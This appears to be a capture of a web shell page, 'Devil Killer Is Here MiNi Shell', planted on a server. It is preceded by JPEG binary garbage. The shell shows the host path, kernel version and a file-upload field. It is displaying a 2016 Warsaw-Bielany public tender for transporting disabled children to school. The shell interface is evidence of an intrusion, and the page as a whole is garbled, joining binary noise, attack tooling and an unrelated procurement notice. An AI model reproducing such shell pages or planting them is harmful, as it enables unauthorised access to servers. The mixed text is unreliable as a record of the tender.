JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160704/117773-N-2016.html

<p class="kh_header"><b>Warszawa: Dowożenie dzieci niepełnosprawnych do szkół i placówek w roku szkolnym 2016/2017 w okresie od 1 września 2016 r. do 31 sierpnia 2017 r</b><br>
<b>Numer ogłoszenia: 117773 - 2016; data zamieszczenia: 04.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa - Dzielnica Bielany , ul. Żeromskiego 29, 01-882 Warszawa, woj. mazowieckie, tel. 022 37 33 333, faks 022 37 33 382.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bielany.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowożenie dzieci niepełnosprawnych do szkół i placówek w roku szkolnym 2016/2017 w okresie od 1 września 2016 r. do 31 sierpnia 2017 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dowożenie w roku 2016/2017 dzieci niepełnosprawnych zamieszkałych w Warszawie na terenie Dzielnicy Bielany do szkół i placówek na trasie dom-szkoła/placówka-dom, wraz z zapewnieniem dzieciom opieki dowożenia, w okresie od 1 września 2016 r. do 31 sierpnia 2017 r.

Dowożeniem objętych jest 58 dzieci uczęszczających do szkół i placówek, zgodnie z wykazem stanowiącym załącznik nr 1 do wzoru umowy (stanowiącego załącznik nr 9 do SIWZ). Zamawiający, w ramach realizacji przedmiotowego zamówienia dopuszcza możliwość (opcję) zwiększenia ilości dowożonych dzieci do maksymalnie 68 dzieci.

Pojazdy, skierowane do realizacji zamówienia mają posiadać ważną homologację do przewozu osób niepełnosprawnych, w tym poruszających się na wózkach inwalidzkich lub ważny wpis w dowodzie rejestracyjnym informujący, że pojazd jest przystosowany do przewozu osób niepełnosprawnych, w tym osób poruszających się na wózkach inwalidzkich. Opiekunowie muszą mieć możliwość dotarcia do dziecka potrzebującego pomocy podczas jazdy.
Uwaga! Usługa nie pełni funkcji transportu medycznego i w związku z tym nie jest świadczona dla osób wymagających przewozu w pozycji leżącej. Pojazdy, w których transport osób odbywa się tylko w pozycji leżącej nie będą brane pod uwagę. W celu zapewnienia jakości wykonywania usługi samochody muszą być wyprodukowane nie wcześniej niż w 2011 r.

Usługa będąca przedmiotem zamówienia musi być realizowana zgodnie z ustawą o transporcie drogowym z dnia 6 września 2001 r. (t.j. - Dz.U. z 2013 r., poz. 1414 z późn.zm.) oraz ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (t.j. - Dz.U. z 2012 r., poz. 1137 z późn.zm.).

Szczegółowy zakres przedmiotu zamówienia opisuje wzór umowy (stanowiący załącznik nr 9 do SIWZ), w tym załącznik nr 1 do wzoru umowy - Wykaz dzieci niepełnosprawnych zamieszkałych na terenie Dzielnicy Bielany m.st. Warszawy objętych dowozem w roku szkolnym 2016/2017..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy ubiegający się o zamówienie jest zobowiązany wnieść wadium przed upływem terminu składania ofert - w wysokości 20 000,00 złotych (słownie: dwadzieścia tysięcy 00/100 złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału w postępowaniu Zamawiający uzna Wykonawców, którzy wykażą, że posiadają aktualną na dzień składania ofert licencję na wykonywanie krajowego transportu drogowego w zakresie przewozu osób, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (tekst jednolity - Dz.U. 2013, poz.1414 z późn.zm.).

Ocena spełnienia warunku zostanie dokonana na podstawie aktualnej licencji, o której mowa w treści warunku oraz oświadczenia o spełnieniu warunków udziału w postępowaniu, o których mowa w art.22 ust.1 pkt 1-4 ustawy Pzp, wg zasady spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniający warunek udziału w postępowaniu Zamawiający uzna Wykonawców, którzy wykażą, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali (zakończyli) lub wykonują, przez ciągły okres następujących po sobie 6 miesięcy jedną usługę dotyczącą przewozu dzieci niepełnosprawnych (tj. dzieci i/lub młodzieży niepełnosprawnej - do 25 roku życia) realizowanego w myśl ustawy z dnia 7 września 1991 r. o systemie oświaty (t.j. - Dz.U. z 2015 r., poz. 2156 z późn.zm.) o wartości (usługi) co najmniej 500 000,00 zł brutto. 
Spełnienie warunku można również wykazać wskazując na wykonanie zobowiązań wynikających z zamówienia podstawowego oraz zamówienia/ń uzupełniającego/ych do zamówienia podstawowego.
W przypadku, gdy Wykonawca wykaże się usługą, która jest w toku realizacji, Zamawiający uzna warunek za spełniony, jeżeli na dzień składania ofert, Wykonawca wypełni wymogi określone przez Zamawiającego w niniejszym warunku.
Ocena spełnienia warunku zostanie dokonana na podstawie wykazu wykonanych/wykonywanych usług, dowodów że zostały wykonane lub są wykonywane należycie oraz oświadczenia o spełnieniu warunków udziału w postępowaniu, o których mowa w art.22 ust.1 pkt 1-4 ustawy Pzp, wg zasady spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniający warunek udziału w postępowaniu Zamawiający uzna Wykonawców, którzy wykażą, że dysponują dopuszczonymi do ruchu i odpowiednio oznakowanymi oraz wyprodukowanymi nie wcześniej niż w 2011 r. samochodami w ilości minimum 12 szt., w tym minimum 6 samochodami przystosowanymi do przewożenia osób niepełnosprawnych poruszających się na wózkach, tj. wyposażonymi w szyny do mocowania wózków dla osób niepełnosprawnych, rampy lub windy umożliwiające wjazd wózkiem z osobą niepełnosprawną do samochodu oraz wyposażonej w pasy do przypinania osób znajdujących się na wózkach.
Ocena spełnienia warunku zostanie dokonana na podstawie wykazu urządzeń technicznych (pojazdów) oraz oświadczenia o spełnieniu warunków udziału w postępowaniu, o których mowa w art.22 ust.1 pkt 1-4 ustawy Pzp, wg zasady spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniający warunek udziału w postępowaniu Zamawiający uzna Wykonawców, którzy wykażą, że dysponują osobami zdolnymi do wykonania zamówienia, w szczególności co najmniej:
a)	Kierowcami w liczbie nie mniejszej niż liczba pojazdów, tj. min. 12 kierowców, którzy spełniają wymagania określone przez ustawę z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz.U. z 2013 r., Nr 1414 z późn.zm.);
b)	Osobami do opieki nad dziećmi (opiekunami) posiadającymi przeszkolenie w zakresie udzielania pierwszej pomocy medycznej lub przedmedycznej lub co najmniej 6 miesięczne doświadczenie w opiece nad dziećmi niepełnosprawnymi (dziećmi niepełnosprawnymi i/lub młodzieżą niepełnosprawną - do 25 roku życia), w liczbie niezbędnej do prawidłowej realizacji przedmiotu zamówienia, tj. w liczbie nie mniejszej niż 12 opiekunów.

Ocena spełnienia warunku zostanie dokonana na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia oraz oświadczenia o spełnieniu warunków udziału w postępowaniu, o których mowa w art.22 ust.1 pkt 1-4 ustawy Pzp, wg zasady spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty o treści zgodnej ze wzorem stanowiącym zał.
Nr 1 do SIWZ. 

2. Inne dokumenty wymagane w postępowaniu:
a)Jeżeli oferta, w tym wszelkie oświadczenia i dokumenty zostały podpisane przez osobę/by działające na podstawie pełnomocnictwa, do oferty należy dołączyć właściwe pełnomocnictwo w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza. 
b)Pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (oryginał lub notarialnie poświadczona kopia). 
c)W przypadku gdy wykonawca przy wykazywaniu warunków udziału w postępowaniu polega na
zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy PZP, zobowiązany jest
udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w
szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do
dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Udowodnienie, o którym mowa powyżej powinno obejmować nie tylko wskazanie faktu udostępnienia
określonych wykonawcy zasobów przez podmiot trzeci, ale winno wyrażać w sposób wyraźny i
jednoznaczny wolę udzielenia, wskazywać jego rodzaj, czas udzielenia a także inne istotne okoliczności,
w tym wynikające ze specyfiki tego zasobu. 
W przypadku nie udowodnienia w ofercie, w wystarczający sposób dysponowania zasobami podmiotu trzeciego, niezbędnymi dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do tych zasobów, w trakcie badania dokumentów złożonych w toku postępowania o udzielenie zamówienia publicznego, zamawiający wezwie wykonawcę do przedstawienia zamawiającemu dokumentów, dotyczących w szczególności: 
1) zakresu dostępnych wykonawcy zasobów innego podmiotu, 
2) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu
zamówienia, 
3) charakteru stosunku jaki będzie łączył wykonawcę z innym podmiotem
4) zakresu i okresu udziału innego podmiotu w wykonywaniu zamówienia. 
Przykładowy wzór zobowiązania w zakresie opisanego warunku udziału w postępowaniu, tj. posiadanej wiedzy i doświadczenia, potencjału technicznego oraz osób zdolnych do wykonania zamówieni - stanowi załącznik nr 7 do SIWZ.

3. Zasady wspólnego ubiegania się o udzielenie zamówienia przez wykonawców, o których mowa w art. 23 ustawy Pzp:
1) Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia mogą łącznie spełniać warunki o których mowa w art. 22 ust. 1 pkt 1-4 ustawy Pzp. 
2) Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia publicznego (np. spółki cywilne, konsorcja) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo to, o którym również mowa w sekcji III - pkt 6) 2. lit. b) Ogłoszenia należy dołączyć do oferty
3) W przypadku złożenia wspólnej oferty, w formularzu oferty pełnomocnik zaznacza w czyim imieniu występuje.
4) Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem. 
5) Żaden z Wykonawców składających wspólnie wniosek, nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 24 ustawy Pzp. (oświadczenie i dokumenty, o których mowa w sekcji III - pkt 4.2). oraz pkt 4.4) Ogłoszenia składają wszyscy Wykonawcy składający wspólny wniosek). 
6)Oświadczenie, o którym mowa w sekcji III - pkt 4.1) - Wykonawcy wspólnie ubiegający się o udzielnie
zamówienia składają wspólnie (tj. oświadczenie ma zostać podpisane przez wszystkich Wykonawców, bądź umocowanego Pełnomocnika Wykonawców), potwierdzając iż określone warunki spełniają razem. 
Dokument wymieniony w sekcji III - pkt 4.1) (potwierdzających posiadanie uprawnień itd.) Ogłoszenia składają wszyscy Wykonawcy składający ofertę wspólną. Dokumenty wymienione w sekcji III - pkt 4.1) (wykaz wykonanych, a w przypadku świadczeń okresowych itd.) Ogłoszenia składa jeden z Wykonawców składających ofertę wspólną, tak aby potwierdzić spełnienie warunku. Dokumenty wymienione w sekcji III - pkt 4.1) (wykaz narzędzi itd., wykaz osób itd.) Ogłoszenia winien przedłożyć jeden albo więcej Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tak aby potwierdzić łącznie spełnianie warunku, którego dotyczy.

4. Odnosząc się do głównych usług, o których mowa w sekcji III - pkt 4.1) Ogłoszenia Zamawiajacy wskazuje, iż  za główne usługi dla których należy przedstawić dowody, uznaje się usługi potwierdzające spełnienie warunku udziału w postępowaniu w zakresie wiedzy i doświadczenia, o którym mowa w sekcji III - pkt 3.2) Ogłoszenia.

5.Odnosząc się do dowodów, o których mowa w sekcji III - pkt 4.1) Ogłoszenia Zamawiający wskazuje, iż:
Dowodami dotyczącymi wykazanej usługi są: 
A) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania . 
B) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w lit.a).

6. Informacja uzupełniająca: 
6.1. Pod pojęciem dokumentu o którym mowa w sekcji III - pkt 4.1) (potwierdzających posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesji, zezwolenia lub licencji) Ogłoszenia - Zamawiający rozumie aktualną na dzień składania ofert licencję zezwalającą na wykonywanie krajowego transportu drogowego w zakresie przewozu osób, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (tekst jednolity - Dz.U. 2013, poz.1414 z późn.zm.).
6.2.Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji III - pkt. 4.3.1) Ogłoszenia,
zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione
do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo
organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby
lub kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania
wniosków o dopuszczenie do udziału w postępowaniu. Dokumenty sporządzone w języku obcym są
składane wraz z tłumaczeniem na język polski.

7. Termin realizacji zamówienia: od 01.09.2016 r. do 31.08.2017 r. we wszystkie dni nauki, zgodnie z kalendarzem roku szkolnego 2016 na 2017 r.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Jakość - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:

Zakazuje się istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy za wyjątkiem niżej opisanych:
1)	 zmiana osób pełniących funkcję kierowców z przyczyn losowych z uzasadnieniem przyczyny tej zmiany z zastrzeżeniem, że osoby te muszą spełniać wymagania zawarte w Ogłoszeniu,
2)	 zmiana osób pełniących funkcję opiekunów z przyczyn losowych z uzasadnieniem przyczyny tej zmiany z zastrzeżeniem, że osoby te muszą spełniać wymagania zawarte w Ogłoszeniu,
3)	 zmiana urządzeń technicznych (pojazdów) z przyczyn losowych, technicznych z uzasadnieniem przyczyny tej zmiany z zastrzeżeniem, że urządzenia techniczne (pojazdy) te muszą spełniać wymagania zawarte w Ogłoszeniu;
4)	 zmiana podmiotu uczestniczącego w realizacji zamówienia (w tym podwykonawcy), na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 jest możliwa, pod warunkiem, iż proponowany inny podmiot (podwykonawca) lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany warunkiem udziału w postępowaniu o udzielenie zamówienia  (zapis będzie miał zastosowanie w sytuacji kiedy Wykonawca polega na zasobach innych podmiotów przy wykonywaniu zamówienia, na zasadach określonych w art.26 ust.2b ustawy Prawo zamówień publicznych).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bielany.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych dla Dzielnicy Bielany, ul.Żeromskiego 29, pok.385. SIWZ można pobrać do 12.07.2016 r..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2016 godzina 12:00, miejsce: Wydział Zamówień Publicznych dla Dzielnicy Bielany, ul.S.Żeromskiego 29, pok.385.  Otwarcie ofert w tym samym dniu, godzina 12:30, sala 352..</p>
